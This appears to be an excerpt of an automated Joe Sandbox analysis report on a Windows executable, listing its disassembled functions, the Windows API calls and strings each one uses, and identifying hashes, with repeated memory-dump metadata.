                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: CompatibleCreate$BitmapBitsObjectSelectStretch
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: (
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3300687185-3887548279
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: a49f41e91dac5baa2c50b775dc8de30f0d01d64d4146e99f951c4697ae3d27a6
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: a007e7ec8c3f390601fcb6226b5fc218b62818acb39bbc9fe8cd9ddeb27b86ed
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a49f41e91dac5baa2c50b775dc8de30f0d01d64d4146e99f951c4697ae3d27a6
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E4514871508345AFD310CF69C884B6BBBE9EF8A310F14881DFA9687390D7B5E844CB66
                                                                                                                                                                                                                                                                                                                                                                                                                Function 0045E41B Relevance: 21.2, APIs: 6, Strings: 6, Instructions: 150COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0045E463
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                                                                                                                                                                                                                                                                                                                                                                • LoadStringW.USER32(?,00000072,?,00000FFF), ref: 0045E480
                                                                                                                                                                                                                                                                                                                                                                                                                • __swprintf.LIBCMT ref: 0045E4D9
                                                                                                                                                                                                                                                                                                                                                                                                                • _printf.LIBCMT ref: 0045E595
                                                                                                                                                                                                                                                                                                                                                                                                                • _printf.LIBCMT ref: 0045E5B7
                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: LoadString_printf$__swprintf_wcslen
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR $HH
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3590180749-2894483878
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: ef66654f81976a0e6a78d75721240b4b5dad2d0c7f05b7bb9659983eace5fa73
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 42a5c2f6345f2e10047da6565a111f96cfad8617a22bea28fc44504b1d19b7ce
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ef66654f81976a0e6a78d75721240b4b5dad2d0c7f05b7bb9659983eace5fa73
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9F51A171518345ABD324EF91CC41DAF77A8AF84754F04093FF94463292EB78EE488B6A
                                                                                                                                                                                                                                                                                                                                                                                                                Function 0046F90E Relevance: 21.1, APIs: 14, Instructions: 147windowCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 0046F911
                                                                                                                                                                                                                                                                                                                                                                                                                • LoadImageW.USER32(00000000,?,00000000,00000000,00000000,00002010), ref: 0046F929
                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,000000F7,00000000,00000000), ref: 0046F942
                                                                                                                                                                                                                                                                                                                                                                                                                • DeleteObject.GDI32(?), ref: 0046F950
                                                                                                                                                                                                                                                                                                                                                                                                                • DestroyIcon.USER32(?,?,000000F7,00000000,00000000,?,00000000,00000000,00000000,00002010,?,000000F0), ref: 0046F95E
                                                                                                                                                                                                                                                                                                                                                                                                                • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00002010), ref: 0046F9A8
                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,000000F7,00000001,00000000), ref: 0046F9C1
                                                                                                                                                                                                                                                                                                                                                                                                                • DeleteObject.GDI32(?), ref: 0046F9CF
                                                                                                                                                                                                                                                                                                                                                                                                                • DestroyIcon.USER32(?,?,000000F7,00000001,00000000,?,00000001,00000000,00000000,00002010), ref: 0046F9DD
                                                                                                                                                                                                                                                                                                                                                                                                                • ExtractIconExW.SHELL32(?,?,?,000000FF,00000001), ref: 0046FA1D
                                                                                                                                                                                                                                                                                                                                                                                                                • DestroyIcon.USER32(?), ref: 0046FA4F
                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,000000F7,00000001,?), ref: 0046FA5A
                                                                                                                                                                                                                                                                                                                                                                                                                • DeleteObject.GDI32(?), ref: 0046FA68
                                                                                                                                                                                                                                                                                                                                                                                                                • DestroyIcon.USER32(?,?,000000F7,00000001,?), ref: 0046FA76
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Icon$Destroy$DeleteMessageObjectSend$ImageLoad$ExtractLongWindow
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3412594756-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: f692dd120a8e9e8c350368ee646f6d7ebba10fee5470a76da8eaf9bc85602db5
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 2b127e2e725f503062080ad48664a75956f0b49bd2ac624c91da1236fc619d99
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f692dd120a8e9e8c350368ee646f6d7ebba10fee5470a76da8eaf9bc85602db5
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BD41B575344301ABE7209B65ED45B6B7398EB44711F00083EFA85A7381DBB9E809C76A
                                                                                                                                                                                                                                                                                                                                                                                                                Function 0045D971 Relevance: 21.1, APIs: 4, Strings: 8, Instructions: 140COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 0045335B: CharLowerBuffW.USER32(?,?,?,0045D9DB,?,?,?), ref: 0045336E
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00445975: _wcslen.LIBCMT ref: 00445984
                                                                                                                                                                                                                                                                                                                                                                                                                • GetDriveTypeW.KERNEL32 ref: 0045DA30
                                                                                                                                                                                                                                                                                                                                                                                                                • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DA76
                                                                                                                                                                                                                                                                                                                                                                                                                • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DAAB
                                                                                                                                                                                                                                                                                                                                                                                                                • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DADF
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: SendString$_wcslen$BuffCharDriveLowerType
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 4013263488-4113822522
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: b9e44105478404289108567262d296c88e7101013f7783f6c7bd148379995db0
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 78e8968fe3d68f28a61334a0544e46eb3ade7c09d07056eb4a028b8014bab4f9
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b9e44105478404289108567262d296c88e7101013f7783f6c7bd148379995db0
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 86516E71604300ABD710EF55CC85F5EB3E4AF88714F14496EF985AB2D2D7B8E908CB5A
                                                                                                                                                                                                                                                                                                                                                                                                                Function 00435A35 Relevance: 21.1, APIs: 14, Instructions: 136timeCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: _wcslen$_wcsncpy$LocalTime__wcstoi64
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 228034949-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: d55b35800c2a6f74fd0df3de6656c0821778ac1c15f087543c4dc83ec7dd6154
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: c9113392db11e6d0b84b7dcaf0f9983ae7bcdcfbf3325debe08446cd55f13bc3
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d55b35800c2a6f74fd0df3de6656c0821778ac1c15f087543c4dc83ec7dd6154
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 874194B181435066DA10FF6AC8479DFB3A8EF89314F84495FF945D3162E378E64883AA
                                                                                                                                                                                                                                                                                                                                                                                                                Function 004334CA Relevance: 21.1, APIs: 14, Instructions: 132filecommemoryCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,?,0046FAD5), ref: 004334F4
                                                                                                                                                                                                                                                                                                                                                                                                                • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,0046FAD5,?,?,?,?), ref: 0043350F
                                                                                                                                                                                                                                                                                                                                                                                                                • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,0046FAD5,?,?,?,?), ref: 0043351A
                                                                                                                                                                                                                                                                                                                                                                                                                • GlobalLock.KERNEL32(00000000), ref: 00433523
                                                                                                                                                                                                                                                                                                                                                                                                                • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,?,0046FAD5,?,?,?,?), ref: 00433533
                                                                                                                                                                                                                                                                                                                                                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 0043353A
                                                                                                                                                                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?,0046FAD5,?,?,?,?), ref: 00433541
                                                                                                                                                                                                                                                                                                                                                                                                                • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,0046FAD5,?,?,?,?), ref: 0043354F
                                                                                                                                                                                                                                                                                                                                                                                                                • OleLoadPicture.OLEAUT32(?,00000000,00000000,00482A20,?), ref: 00433568
                                                                                                                                                                                                                                                                                                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 0043357B
                                                                                                                                                                                                                                                                                                                                                                                                                • GetObjectW.GDI32(?,00000018,?), ref: 004335A6
                                                                                                                                                                                                                                                                                                                                                                                                                • CopyImage.USER32(?,00000000,?,?,00002000), ref: 004335DB
                                                                                                                                                                                                                                                                                                                                                                                                                • DeleteObject.GDI32(?), ref: 00433603
                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000172,00000000,?), ref: 0043361B
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Global$File$CreateObject$AllocCloseCopyDeleteFreeHandleImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3969911579-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: c8af0a6d34b3156cf5dea3d494721158f709963105dd3e2632bd1b1f7de041f4
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 5aed18668fdc988692497ed4484016cc97142e8c7c748bcd34b77a3330007e11
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c8af0a6d34b3156cf5dea3d494721158f709963105dd3e2632bd1b1f7de041f4
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 70410471204210AFD710DF64DC88F6BBBE8FB89711F10492DFA45972A0D7B5A941CBAA
                                                                                                                                                                                                                                                                                                                                                                                                                Function 00445A77 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 73windowCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • GetParent.USER32 ref: 00445A8D
                                                                                                                                                                                                                                                                                                                                                                                                                • GetClassNameW.USER32(00000000,?,00000100), ref: 00445AA0
                                                                                                                                                                                                                                                                                                                                                                                                                • __wcsicoll.LIBCMT ref: 00445AC4
                                                                                                                                                                                                                                                                                                                                                                                                                • __wcsicoll.LIBCMT ref: 00445AE0
                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00445B3D
                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: __wcsicoll$ClassMessageNameParentSend
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3125838495-3381328864
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 6f6f70247b4827d2a410ddc22f410c306ecb8b2e46d0c95c17204de523c723c4
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 9ea7b4bfd8e333fc3d4c3d1cc69785ca983c3453aa66f955cff8de8c622a02b1
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6f6f70247b4827d2a410ddc22f410c306ecb8b2e46d0c95c17204de523c723c4
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F011E9B1B40301BBFF10B6659C46EAF739CDF94759F00081BFD44E6182F6ACA9458769
                                                                                                                                                                                                                                                                                                                                                                                                                Function 00479921 Relevance: 19.6, APIs: 8, Strings: 3, Instructions: 314COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: CopyVariant$ErrorLast
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: Conversion of parameters failed$NULL Pointer assignment$Not an Object type
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2286883814-4206948668
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 2f6e4bc4aaf8f7a3794965dba448b56a5b6575b3b05f264a778baa01eb75d6f6
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 5c76bcf0434180a49ef26f8382d3619d889c8a8ee3f63882ad125ac36acecb62
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2f6e4bc4aaf8f7a3794965dba448b56a5b6575b3b05f264a778baa01eb75d6f6
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4EA1F0B1644300ABD620EB25CC81EABB3E9FBC4704F10891EF65987251D779E945CBAA
                                                                                                                                                                                                                                                                                                                                                                                                                Function 00475D8B Relevance: 19.4, APIs: 2, Strings: 9, Instructions: 194COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 0045335B: CharLowerBuffW.USER32(?,?,?,0045D9DB,?,?,?), ref: 0045336E
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00445975: _wcslen.LIBCMT ref: 00445984
                                                                                                                                                                                                                                                                                                                                                                                                                • GetDriveTypeW.KERNEL32(?,?,00000061), ref: 00475EEC
                                                                                                                                                                                                                                                                                                                                                                                                                • _wcscpy.LIBCMT ref: 00475F18
                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: BuffCharDriveLowerType_wcscpy_wcslen
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: a$all$cdrom$fixed$network$ramdisk$removable$unknown$HH
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3052893215-4176887700
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 531685fb0cf90d6ae2ec3f9560420c3d557b818d2d0e5f32259ad5e7ccb69ffd
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 30c0e749cffa51fc832ec364bb88d57898ea161693411a08ebb212f54f1b1ce2
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 531685fb0cf90d6ae2ec3f9560420c3d557b818d2d0e5f32259ad5e7ccb69ffd
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E951E5716047009BC710EF51D981B9BB3D4AB85705F108C2FF948AB382D7B9DE09879B
                                                                                                                                                                                                                                                                                                                                                                                                                Function 004582BF Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 165registryCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • StringFromIID.OLE32(?,?,00000003,?,?,00000000), ref: 004582E5
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 0040FFF0: _wcslen.LIBCMT ref: 0040FFF2
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 0040FFF0: _wcscpy.LIBCMT ref: 00410012
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                                                                                                                                                                                                                                                                                                                                                                                • CoTaskMemFree.OLE32(?,00000000), ref: 00458335
                                                                                                                                                                                                                                                                                                                                                                                                                • RegOpenKeyExW.ADVAPI32(80000000,?,00000000,00020019,?), ref: 00458351
                                                                                                                                                                                                                                                                                                                                                                                                                • RegQueryValueExW.ADVAPI32 ref: 00458381
                                                                                                                                                                                                                                                                                                                                                                                                                • CLSIDFromString.OLE32(00000000,?), ref: 004583AF
                                                                                                                                                                                                                                                                                                                                                                                                                • RegQueryValueExW.ADVAPI32 ref: 004583E8
                                                                                                                                                                                                                                                                                                                                                                                                                • LoadRegTypeLib.OLEAUT32(?,?), ref: 00458486
